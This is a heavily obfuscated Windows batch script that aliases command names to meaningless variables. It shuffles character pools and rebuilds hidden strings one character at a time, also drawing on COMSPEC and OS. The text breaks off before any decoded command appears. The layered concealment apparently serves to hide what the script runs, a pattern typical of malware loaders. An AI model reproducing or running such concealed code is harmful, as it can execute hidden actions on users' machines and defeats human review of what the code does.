@echo off
setlocal enabledelayedexpansion
chcp 65001 >nul
set "m_I_0lIl_l0l=set"
set "p1_IIOll0IO0_=m_I_0lIl_l0l"
set "p2__OI___l_O_=p1_IIOll0IO0_"
set "m__I_0OI_lIl=goto"
set "p1_I0__OOlIIl=m__I_0OI_lIl"
set "p2_lO_OOll__0=p1_I0__OOlIIl"
set "m_IlOOI_l_IO=title"
set "p1_IIOOl_lOI_=m_IlOOI_l_IO"
set "p2_Illl0llI00=p1_IIOOl_lOI_"
set "m_lII00_lI0I=pause"
set "p1_IOO0_IOO_l=m_lII00_lI0I"
set "p2_l0O_OlIlll=p1_IOO0_IOO_l"
set "m_IO_I0IOlIO=rem"
set "p1___0_I0_Il0=m_IO_I0IOlIO"
set "p2_lIO_0IO_0I=p1___0_I0_Il0"
set "m_II0lIl_O0I=call"
set "p1_I0_lO__IIl=m_II0lIl_O0I"
set "p2_Il0l0O_lO_=p1_I0_lO__IIl"
set "m_lOOIIlOIIO=exit"
set "p1__lOOOO_l_O=m_lOOIIlOIIO"
set "p2__lIIOO0IO_=p1__lOOOO_l_O"
set "m_I0Il0_O0lI=echo"
set "p1__Ol_IIl__0=m_I0Il0_O0lI"
set "p2__0_lOI0_I_=p1__Ol_IIl__0"
set "m_l_O0IIlllI=chcp"
set "p1_l___l0OOO0=m_l_O0IIlllI"
set "p2_l__O0_Oll0=p1_l___l0OOO0"
set "v_l__O0I_lI00O=_O_lIl_IOl__"
set "v_l_II0I0_Il0I=LB_EXIT_I_ll__l0"
set "pool___lIl00l=GMeKXUh0E.N/fzq\~wuy_mIjlDiRSHBWLdvo4aVbtOpF5YkJT2cQZ19g:rA7s8P3@-n6xC"
call set "pool___lIl00l=%%pool___lIl00l:C=#SNJGDJYH#%%" & rem [PbzS6oW0s@tEZW3xNM
call set "pool___lIl00l=%%pool___lIl00l:4=C%%"
call set "pool___lIl00l=%%pool___lIl00l:#SNJGDJYH#=4%%"
call set "pool___lIl00l=%%pool___lIl00l:O=#BZBKPW#%%" & rem D1}$n[YGO#K8isH1,T
call set "pool___lIl00l=%%pool___lIl00l:c=O%%"
call set "pool___lIl00l=%%pool___lIl00l:#BZBKPW#=c%%"
call set "pool___lIl00l=%%pool___lIl00l:6=#TJDMYQWIA#%%" & rem =p[4gr#:bABeXJ}0C#I
call set "pool___lIl00l=%%pool___lIl00l:A=6%%"
call set "pool___lIl00l=%%pool___lIl00l:#TJDMYQWIA#=A%%"
set /a "ll000_=45" & rem AdxyI@Xe]rXCO~Pbv:yt
set /a "__I_00=((-32+32)*5)"
for /f "tokens=2 delims==" %%A in ('set ll000_') do for /f "tokens=2 delims==" %%C in ('set __I_00') do call set "pool___lIl00l=%%pool___lIl00l:~%%A%%%%%%pool___lIl00l:~%%C,%%A%%"
call set "pool___lIl00l=%%pool___lIl00l:n=#SELMVIDTF#%%" & rem QNmC2WM;[U$S
call set "pool___lIl00l=%%pool___lIl00l:Z=n%%"
call set "pool___lIl00l=%%pool___lIl00l:#SELMVIDTF#=Z%%"
set /a "lIOII0=(3+10)" & rem KK{?,]gxYrY9
set /a "I_l0_0=((((-4*5)+3)+17)*2)"
for /f "tokens=2 delims==" %%A in ('set lIOII0') do for /f "tokens=2 delims==" %%C in ('set I_l0_0') do call set "pool___lIl00l=%%pool___lIl00l:~%%A%%%%%%pool___lIl00l:~%%C,%%A%%"
call set "pool___lIl00l=%%pool___lIl00l:d=#OLLYKP#%%" & rem mEnhn,98-:Ww
call set "pool___lIl00l=%%pool___lIl00l:1=d%%"
call set "pool___lIl00l=%%pool___lIl00l:#OLLYKP#=1%%"
set "v_j_l0_IO_=!pool___lIl00l:~0,1!"
if "!v_j_l0_IO_!"=="_" (call :L_DISPATCH)

set "pool_IIIlIO0l=F15MXcka0Dn/NPQ.LVCdRv:_BHGyYSJZIm4zhqKfO3piE968t-webrWlg2x7jUu~\Ao@sT"
set /a "l_II__=(23+10)" & rem G[5;-J]{/A2N7
set /a "lOI0O_=(0*4)"
for /f "tokens=2 delims==" %%A in ('set l_II__') do for /f "tokens=2 delims==" %%C in ('set lOI0O_') do call set "pool_IIIlIO0l=%%pool_IIIlIO0l:~%%A%%%%%%pool_IIIlIO0l:~%%C,%%A%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:Z=#TWCMQQKRO#%%" & rem c,7NXO.Y7#XUm#
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:_=Z%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:#TWCMQQKRO#=_%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:_=#BPWCHPIPXT#%%" & rem E_jVxa26[jicGe2DiZ0
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:4=_%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:#BPWCHPIPXT#=4%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:R=#EWFHRYMI#%%" & rem e:=U=ZlvVjZYl]GFkw
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:H=R%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:#EWFHRYMI#=H%%"
set /a "l_l_Ol=39" & rem sSP-YFqOy0?jg51US
set /a "OlI__l=(((-11*4)+3)+41)"
for /f "tokens=2 delims==" %%A in ('set l_l_Ol') do for /f "tokens=2 delims==" %%C in ('set OlI__l') do call set "pool_IIIlIO0l=%%pool_IIIlIO0l:~%%A%%%%%%pool_IIIlIO0l:~%%C,%%A%%"
set /a "lOI0IO=(((((3*6)+3)*3)+1)+(21-21))" & rem tcEp.dK0M]
set /a "I_0_IO=(((((0+7)*5)+4)-39)+(22-22))"
for /f "tokens=2 delims==" %%A in ('set lOI0IO') do for /f "tokens=2 delims==" %%C in ('set I_0_IO') do call set "pool_IIIlIO0l=%%pool_IIIlIO0l:~%%A%%%%%%pool_IIIlIO0l:~%%C,%%A%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:N=#QODDQ#%%" & rem na~?{ljdhK
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:y=N%%"
call set "pool_IIIlIO0l=%%pool_IIIlIO0l:#QODDQ#=y%%"
set "v_j_I0OO_0=!pool_IIIlIO0l:~0,1!"
if "!v_j_I0OO_0!"=="I" (call :L_DISPATCH)

set "pool_lO0l_II0=LA6bF_BUuEXms@aYNOJe9T:znjk1D/S.qG2r73Hf~yiK8pVW-IRcZ5\vdw4lM0hxQCtgoP"
call set "pool_lO0l_II0=%%pool_lO0l_II0:Y=#PMWQNGBO#%%" & rem =N?OQAr4qW
call set "pool_lO0l_II0=%%pool_lO0l_II0:e=Y%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:#PMWQNGBO#=e%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:\=#BWOKTACNAD#%%" & rem 777LvrcEo+tiB
call set "pool_lO0l_II0=%%pool_lO0l_II0:-=\%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:#BWOKTACNAD#=-%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:5=#MBLUUARHIJ#%%" & rem xmzZ=HoE@C~
call set "pool_lO0l_II0=%%pool_lO0l_II0:M=5%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:#MBLUUARHIJ#=M%%"
set /a "_Ol_lI=((9-4)+31)" & rem ZIkYhu.}MJ
set /a "OO_I0O=(((33-37)*6)+24)"
for /f "tokens=2 delims==" %%A in ('set _Ol_lI') do for /f "tokens=2 delims==" %%C in ('set OO_I0O') do call set "pool_lO0l_II0=%%pool_lO0l_II0:~%%A%%%%%%pool_lO0l_II0:~%%C,%%A%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:@=#HEHGTAKHJ#%%" & rem $eNUh3QE{em
call set "pool_lO0l_II0=%%pool_lO0l_II0:d=@%%"
call set "pool_lO0l_II0=%%pool_lO0l_II0:#HEHGTAKHJ#=d%%"
set /a "OOIl0O=(((76-33)-19)+(25-25))" & rem Xcq34MwJ;[oJ=ZOP
set /a "__l_OI=((22-42)+20)"
for /f "tokens=2 delims==" %%A in ('set OOIl0O') do for /f "tokens=2 delims==" %%C in ('set __l_OI') do call set "pool_lO0l_II0=%%pool_lO0l_II0:~%%A%%%%%%pool_lO0l_II0:~%%C,%%A%%"
set /a "I_O_l0=((((1*3)+2)*6)+3)" & rem fb38j6Xd6iL5OzEX
set /a "OIII00=((8-8)*5)"
for /f "tokens=2 delims==" %%A in ('set I_O_l0') do for /f "tokens=2 delims==" %%C in ('set OIII00') do call set "pool_lO0l_II0=%%pool_lO0l_II0:~%%A%%%%%%pool_lO0l_II0:~%%C,%%A%%"
set "v_j_lIIIII=!pool_lO0l_II0:~0,1!"
if "!v_j_lIIIII!"=="l" (call :L_DISPATCH)

set /a "v_i_O0_llI=((20+16)+19)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0_llI') do call set "v_l_lOl_I0I_lI=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__lIO0l0O_O=!v_l_lOl_I0I_lI!"
set /a "v_i_O0I0I_=(109-42)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0I0I_') do call call call set "v_c_O0lOlOIOO0=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i__l_lOl=(((((46*2)+1)-39)-15)+(2-2))"
for /f "tokens=2 delims==" %%I in ('set v_i__l_lOl') do call set "v_l_OI0IlOl_l0=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l0OIO0_I0O=!v_l_OI0IlOl_l0!"
set /a "v_i_lO__0I=(89-20)"
for /f "tokens=2 delims==" %%I in ('set v_i_lO__0I') do call set "v_l_I0I__Ill0I=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_llIllO0__0=!v_l_I0I__Ill0I!"
set /a "v_i___II0O=(((22*3)+2)-40)"
for /f "tokens=2 delims==" %%I in ('set v_i___II0O') do call set "v_l_I_lll__0Il=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_O0IO0IIlI_=!v_l_I_lll__0Il!"
set /a "v_i_I0l__I=((-1+36)+11)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0l__I') do call set "v_l_II__OOI0OI=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_Ol0O0OlIl_=!v_l_II__OOI0OI!"
set /a "v_i_l0l_0I=(((6*3)+24)+(14-14))"
set "v_p__0_ll_lI0O=v_l_OI0_000ll_"
for /f "tokens=2 delims==" %%I in ('set v_i_l0l_0I') do for /f "delims=" %%A in ("!v_p__0_ll_lI0O!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_l0OOIIOl0O=!v_l_OI0_000ll_!"
set /a "v_i__lOOlI=(59-45)"
for /f "tokens=2 delims==" %%I in ('set v_i__lOOlI') do call set "v_l_O__OlIO_II=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_III0l____l=!v_l_O__OlIO_II!"
set /a "v_i_Ol_OI0=17"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol_OI0') do call set "v_l__O0_I0__0O=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_Ol0l_0I__I=!v_l__O0_I0__0O!"
set /a "v_i_O_I_IO=((((107+5)-46)-17)+(14-14))"
for /f "tokens=2 delims==" %%I in ('set v_i_O_I_IO') do call set "v_l_OlO0III0l0=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__IIlIlI0_I=!v_l_OlO0III0l0!"
set /a "v_i_IlOlI_=(((43-40)*5)+(20-20))"
set "v_p__lOIl_I00I=v_l_Il_ll_I000"
for /f "tokens=2 delims==" %%I in ('set v_i_IlOlI_') do for /f "delims=" %%A in ("!v_p__lOIl_I00I!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I0IIO_000_=!v_l_Il_ll_I000!"
set /a "v_i__l0lOI=((((10*6)+2)-36)+(29-29))"
set "v_p_OI00II_IOl=v_l__OlIl_00_I"
for /f "tokens=2 delims==" %%I in ('set v_i__l0lOI') do for /f "delims=" %%A in ("!v_p_OI00II_IOl!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lIlI_OIOl0=!v_l__OlIl_00_I!"
set /a "v_i__OO0_l=(11*6)"
set "v_p_IlOll0O_0O=v_l_lO0_00OO0_"
for /f "tokens=2 delims==" %%I in ('set v_i__OO0_l') do for /f "delims=" %%A in ("!v_p_IlOll0O_0O!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OI0l_OlI0l=!v_l_lO0_00OO0_!"
set /a "v_i___llII=((((((2*4)+3)*5)+3)-41)+(24-24))"
for /f "tokens=2 delims==" %%I in ('set v_i___llII') do call set "v_l_lllllO__0O=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__0OO0lO_l0=!v_l_lllllO__0O!"
set /a "v_i_OIIlO0=(11+14)"
set "v_p__OOI0II0ll=v_l_OO0_Ol__lO"
for /f "tokens=2 delims==" %%I in ('set v_i_OIIlO0') do for /f "delims=" %%A in ("!v_p__OOI0II0ll!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_O00lIlO___=!v_l_OO0_Ol__lO!"
set /a "v_i_IlI0_0=(((0*4)+2)+12)"
for /f "tokens=2 delims==" %%I in ('set v_i_IlI0_0') do call set "v_l_I_O_l_OlIl=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_OIlllIlOOl=!v_l_I_O_l_OlIl!"
set /a "v_i__O0OlI=(((8*6)+5)-34)"
set "v_p____0lO_ll0=v_l_O__IlOIl_O"
for /f "tokens=2 delims==" %%I in ('set v_i__O0OlI') do for /f "delims=" %%A in ("!v_p____0lO_ll0!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lI_llI__OI=!v_l_O__IlOIl_O!"
set /a "v_i_Il0I__=(((((20+25)-39)*3)+2)+(1-1))"
set "v_p_O0OOO_lIOO=v_l_O0IlOI_0Il"
for /f "tokens=2 delims==" %%I in ('set v_i_Il0I__') do for /f "delims=" %%A in ("!v_p_O0OOO_lIOO!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_l_O000O_ll=!v_l_O0IlOI_0Il!"
set /a "v_i_l__lIl=(((-18+33)*3)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_l__lIl') do call set "v_l_lOI_0lI_I_=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__0lO0_000O=!v_l_lOI_0lI_I_!"
set /a "v_i___ll0_=(((((21*2)-42)*6)+4)+(28-28))"
set "v_p_OO_O_0O0_I=v_l__0O0O0l00O"
for /f "tokens=2 delims==" %%I in ('set v_i___ll0_') do for /f "delims=" %%A in ("!v_p_OO_O_0O0_I!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O_IO_0_00_=!v_l__0O0O0l00O!"
set /a "v_i_I0l0_0=(((-9+10)*6)+1)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0l0_0') do call call call set "v_c__lIIll0I0O=%%%%pool_lO0l_II0:~%%I,1%%%%"
set /a "v_i_IOl_00=(((1*6)+4)+31)"
set "v_p__IO__IOl00=v_l_Ill0__IIOO"
for /f "tokens=2 delims==" %%I in ('set v_i_IOl_00') do for /f "delims=" %%A in ("!v_p__IO__IOl00!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__0_0OlI000=!v_l_Ill0__IIOO!"
set /a "v_i__0_llO=((((-4*6)+3)+48)+(27-27))"
set "v_p_l_l0lI0_ll=v_l_l_0l0_IlOI"
for /f "tokens=2 delims==" %%I in ('set v_i__0_llO') do for /f "delims=" %%A in ("!v_p_l_l0lI0_ll!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lI_0_I00l_=!v_l_l_0l0_IlOI!"
set /a "v_i__l00_0=((((6*3)+2)+4)+38)"
for /f "tokens=2 delims==" %%I in ('set v_i__l00_0') do call set "v_l_IOOOIlI0Il=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__OlI0OII0O=!v_l_IOOOIlI0Il!"
set /a "v_i_OO00_0=(((7*6)+4)+(6-6))"
set "v_p_Illl0_OIl_=v_l__0l0O__lIO"
for /f "tokens=2 delims==" %%I in ('set v_i_OO00_0') do for /f "delims=" %%A in ("!v_p_Illl0_OIl_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_l_0l0lO0_I=!v_l__0l0O__lIO!"
set /a "v_i__OOlI0=38"
for /f "tokens=2 delims==" %%I in ('set v_i__OOlI0') do call set "v_l__OlI0IOl00=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_l_l0lllOlO=!v_l__OlI0IOl00!"
set /a "v_i_O00IIl=((((9*3)+2)*2)+1)"
set "v_p__l0llOIl0I=v_l_lI0_l0__I0"
for /f "tokens=2 delims==" %%I in ('set v_i_O00IIl') do for /f "delims=" %%A in ("!v_p__l0llOIl0I!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__0Ol0OO0lI=!v_l_lI0_l0__I0!"
set /a "v_i_l0l_O0=(((((0*5)*4)+3)*5)+4)"
set "v_p_l0I0_IlO0O=v_l_IO_IO00O_0"
for /f "tokens=2 delims==" %%I in ('set v_i_l0l_O0') do for /f "delims=" %%A in ("!v_p_l0I0_IlO0O!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O_000_I__I=!v_l_IO_IO00O_0!"
set /a "v_i_l_O00I=(-13+50)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_O00I') do call set "v_l_l__I0O__Ol=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_I_I_Ol0_OO=!v_l_l__I0O__Ol!"
set /a "v_i___OI_l=((21-23)+27)"
for /f "tokens=2 delims==" %%I in ('set v_i___OI_l') do call call call set "v_c_I_O0I_l__I=%%%%pool___lIl00l:~%%I,1%%%%"
set /a "v_i_lOO_00=((15+23)+3)"
set "v_p_O_00lIlI__=v_l__0II0l_0O_"
for /f "tokens=2 delims==" %%I in ('set v_i_lOO_00') do for /f "delims=" %%A in ("!v_p_O_00lIlI__!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_I_l__I_l_l=!v_l__0II0l_0O_!"
set /a "v_i_lOl_0I=((-13+24)+(13-13))"
set "v_p__O_I0O0_IO=v_l_lO0OlIO_00"
for /f "tokens=2 delims==" %%I in ('set v_i_lOl_0I') do for /f "delims=" %%A in ("!v_p__O_I0O0_IO!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c___l0OIlII0=!v_l_lO0OlIO_00!"
set /a "v_i___000I=((((18*4)+3)-49)+(11-11))"
for /f "tokens=2 delims==" %%I in ('set v_i___000I') do call set "v_l_l_O_l_l___=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_O_I__II_Il=!v_l_l_O_l_l___!"
set /a "v_i_OlO_Ol=(((((-8*6)+3)+48)*6)+5)"
set "v_p__IOOl__O_O=v_l_I0I_I0O0I_"
for /f "tokens=2 delims==" %%I in ('set v_i_OlO_Ol') do for /f "delims=" %%A in ("!v_p__IOOl__O_O!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O0I_0I__0_=!v_l_I0I_I0O0I_!"
set /a "v_i_l_0lIl=(50-30)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_0lIl') do call set "v_l_I0__llI_0_=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_IIOOIlO0_l=!v_l_I0__llI_0_!"
set /a "v_i_IOllII=(((-10*3)+39)*4)"
for /f "tokens=2 delims==" %%I in ('set v_i_IOllII') do call set "v_l_OlI_IIl0I0=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OllOlO00_I=!v_l_OlI_IIl0I0!"
set /a "v_i_OIl_0I=((7*3)+2)"
set "v_p_OllO0I__Il=v_l_ll_llI0_ll"
for /f "tokens=2 delims==" %%I in ('set v_i_OIl_0I') do for /f "delims=" %%A in ("!v_p_OllO0I__Il!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I_00OOIOII=!v_l_ll_llI0_ll!"
set /a "v_i__II__l=(((38-38)*6)+4)"
set "v_p_l0llIl0IOO=v_l_IIOO0O__0I"
for /f "tokens=2 delims==" %%I in ('set v_i__II__l') do for /f "delims=" %%A in ("!v_p_l0llIl0IOO!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OIIl_l_0_l=!v_l_IIOO0O__0I!"
set /a "v_i_OO_Ol0=((((16*2)+1)-16)*2)"
for /f "tokens=2 delims==" %%I in ('set v_i_OO_Ol0') do call set "v_l__l0lOO0OO_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_I__I0ll_ll=!v_l__l0lOO0OO_!"
set /a "v_i__lI_Ol=(((10+19)+29)-20)"
for /f "tokens=2 delims==" %%I in ('set v_i__lI_Ol') do call set "v_l_O0IllOlOl0=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_IlO_0_O_II=!v_l_O0IllOlOl0!"
set /a "v_i__0lIOl=(((90-12)-30)+(11-11))"
for /f "tokens=2 delims==" %%I in ('set v_i__0lIOl') do call call call set "v_c__O_I_OOIOO=%%%%pool_lO0l_II0:~%%I,1%%%%"
set /a "v_i_Il_OO0=(((((36-34)*6)+5)*4)+1)"
set "v_p_lOlO00l0I_=v_l_O0I__O0l__"
for /f "tokens=2 delims==" %%I in ('set v_i_Il_OO0') do for /f "delims=" %%A in ("!v_p_lOlO00l0I_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_II0IIO_IO0=!v_l_O0I__O0l__!"
set /a "v_i_I0OlOO=(((5*6)+8)+10)"
for /f "tokens=2 delims==" %%I in ('set v_i_I0OlOO') do call set "v_l__O0O__O000=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lIII00O0Ol=!v_l__O0O__O000!"
set /a "v_i_llOlI_=(((11*5)+1)-13)"
set "v_p___I__O_IOO=v_l_llOlI_OlOI"
for /f "tokens=2 delims==" %%I in ('set v_i_llOlI_') do for /f "delims=" %%A in ("!v_p___I__O_IOO!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_IIIIOl_l0I=!v_l_llOlI_OlOI!"
set /a "v_i_l0I0Ol=((-8+50)-28)"
for /f "tokens=2 delims==" %%I in ('set v_i_l0I0Ol') do call call call set "v_c_l0lIO_OOI0=%%COMSPEC:~%%I,1%%"
set /a "v_i_l_OIIl=((18-11)+(12-12))"
for /f "tokens=2 delims==" %%I in ('set v_i_l_OIIl') do call set "v_l_Ol00_OOlI_=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c__0__Oll_0_=!v_l_Ol00_OOlI_!"
set /a "v_i_l0l_II=37"
set "v_p_llIOlIl_0l=v_l_lOIIllI00O"
for /f "tokens=2 delims==" %%I in ('set v_i_l0l_II') do for /f "delims=" %%A in ("!v_p_llIOlIl_0l!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_OI0OI_O0l_=!v_l_lOIIllI00O!"
set /a "v_i__O_llI=(39-25)"
for /f "tokens=2 delims==" %%I in ('set v_i__O_llI') do call set "v_l_OI0_Il0O__=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__00IIl0_OI=!v_l_OI0_Il0O__!"
set /a "v_i_Ol000O=((((-24+27)*2)*3)+1)"
set "v_p_llOOIOl_O_=v_l_O0lOl0OO00"
for /f "tokens=2 delims==" %%I in ('set v_i_Ol000O') do for /f "delims=" %%A in ("!v_p_llOOIOl_O_!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__IOO00OI_O=!v_l_O0lOl0OO00!"
set /a "v_i__0I__O=24"
for /f "tokens=2 delims==" %%I in ('set v_i__0I__O') do call call call set "v_c_OOl__II_l_=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set /a "v_i__0I__l=(((44-29)-12)+(13-13))"
set "v_p_O_Il_lOO00=v_l_IOlO_I_IOl"
for /f "tokens=2 delims==" %%I in ('set v_i__0I__l') do for /f "delims=" %%A in ("!v_p_O_Il_lOO00!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__0llO_Il_0=!v_l_IOlO_I_IOl!"
set /a "v_i_lI_0_l=(((((15*6)+4)-10)-41)+(29-29))"
for /f "tokens=2 delims==" %%I in ('set v_i_lI_0_l') do call set "v_l__lIl_l0_0l=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O0I__IlIII=!v_l__lIl_l0_0l!"
set /a "v_i_l00Il_=((5*6)+4)"
set "v_p__l0Il__Ol0=v_l_I00OO0l0O0"
for /f "tokens=2 delims==" %%I in ('set v_i_l00Il_') do for /f "delims=" %%A in ("!v_p__l0Il__Ol0!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_l0II0__I00=!v_l_I00OO0l0O0!"
set /a "v_i_IOIOO0=((((-18*3)+1)+25)+42)"
for /f "tokens=2 delims==" %%I in ('set v_i_IOIOO0') do call set "v_l_I0lI0OO0O0=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_Oll_IlIOOI=!v_l_I0lI0OO0O0!"
set /a "v_i__IOOI_=(((68-38)*2)+1)"
set "v_p__lOIOlI_O0=v_l_llOIOI0lll"
for /f "tokens=2 delims==" %%I in ('set v_i__IOOI_') do for /f "delims=" %%A in ("!v_p__lOIOlI_O0!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_O0_OlO__O_=!v_l_llOIOI0lll!"
set /a "v_i_l_0lI0=(11+18)"
for /f "tokens=2 delims==" %%I in ('set v_i_l_0lI0') do call set "v_l__O_0Ol0l_l=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_IIOlOIIOII=!v_l__O_0Ol0l_l!"
set /a "v_i_l_I0_0=(((-56+49)+42)+(29-29))"
set "v_p_Ol0I0llOOO=v_l_Oll00II__l"
for /f "tokens=2 delims==" %%I in ('set v_i_l_I0_0') do for /f "delims=" %%A in ("!v_p_Ol0I0llOOO!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I_00Ol_IOO=!v_l_Oll00II__l!"
set /a "v_i__0I_l0=((((((11*5)+1)-43)*4)+3)+(30-30))"
set "v_p_IOl0l0_OOl=v_l_IOl00I0IO0"
for /f "tokens=2 delims==" %%I in ('set v_i__0I_l0') do for /f "delims=" %%A in ("!v_p_IOl0l0_OOl!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c__I0IO_O_I0=!v_l_IOl00I0IO0!"
set /a "v_i_lI0O00=(((-8*6)+3)+45)"
set "v_p__00_00I_OO=v_l_I0IOI0_O0_"
for /f "tokens=2 delims==" %%I in ('set v_i_lI0O00') do for /f "delims=" %%A in ("!v_p__00_00I_OO!") do call set "%%A=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_OII__l0O0I=!v_l_I0IOI0_O0_!"
set /a "v_i_I0OIlO=(((0*2)+1)*2)"
set "v_p_lOIlO0IIII=v_l_IOll00l0II"
for /f "tokens=2 delims==" %%I in ('set v_i_I0OIlO') do for /f "delims=" %%A in ("!v_p_lOIlO0IIII!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_I0O000OOII=!v_l_IOll00l0II!"
set /a "v_i_IO00O_=(((25*2)+1)+(8-8))"
set "v_p__l0OlO_lO_=v_l__OI0OOO0Il"
for /f "tokens=2 delims==" %%I in ('set v_i_IO00O_') do for /f "delims=" %%A in ("!v_p__l0OlO_lO_!") do call set "%%A=%%%%pool_lO0l_II0:~%%I,1%%%%"
set "v_c_lIlllllOI_=!v_l__OI0OOO0Il!"
set /a "v_i_Il0II_=(((((-10+10)*4)+2)*6)+1)"
set "v_p_I0l0OIlOl_=v_l_l_lO0lIlOl"
for /f "tokens=2 delims==" %%I in ('set v_i_Il0II_') do for /f "delims=" %%A in ("!v_p_I0l0OIlOl_!") do call set "%%A=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_lIO0_0l___=!v_l_l_lO0lIlOl!"
set /a "v_i_O_lO_l=(((65-24)-31)-2)"
for /f "tokens=2 delims==" %%I in ('set v_i_O_lO_l') do call call call set "v_c_IOI_llllIl=%%OS:~%%I,1%%"
set /a "v_i_O0OII_=((((47-42)*4)+3)+2)"
for /f "tokens=2 delims==" %%I in ('set v_i_O0OII_') do call set "v_l__llII0l_ll=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_l_I0l0_lll=!v_l__llII0l_ll!"
set /a "v_i_I0_lll=((((4*4)+1)+41)+(14-14))"
for /f "tokens=2 delims==" %%I in ('set v_i_I0_lll') do call set "v_l_O___000I_l=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c__OII0lOlIl=!v_l_O___000I_l!"
set /a "v_i_II0OO0=(100-47)"
for /f "tokens=2 delims==" %%I in ('set v_i_II0OO0') do call set "v_l__Il_I0___I=%%%%pool___lIl00l:~%%I,1%%%%"
set "v_c_lII_0l_IO_=!v_l__Il_I0___I!"
set /a "v_i_lI0lIO=(((3*6)+4)*3)"
for /f "tokens=2 delims==" %%I in ('set v_i_lI0lIO') do call set "v_l_OI_lllIO__=%%%%pool_IIIlIO0l:~%%I,1%%%%"
set "v_c_O_I_Ol0_I0=!v_l_OI_lllIO__!"
set /a "v_i_OlI0O0=(((44-33)-8)+(26-26))"
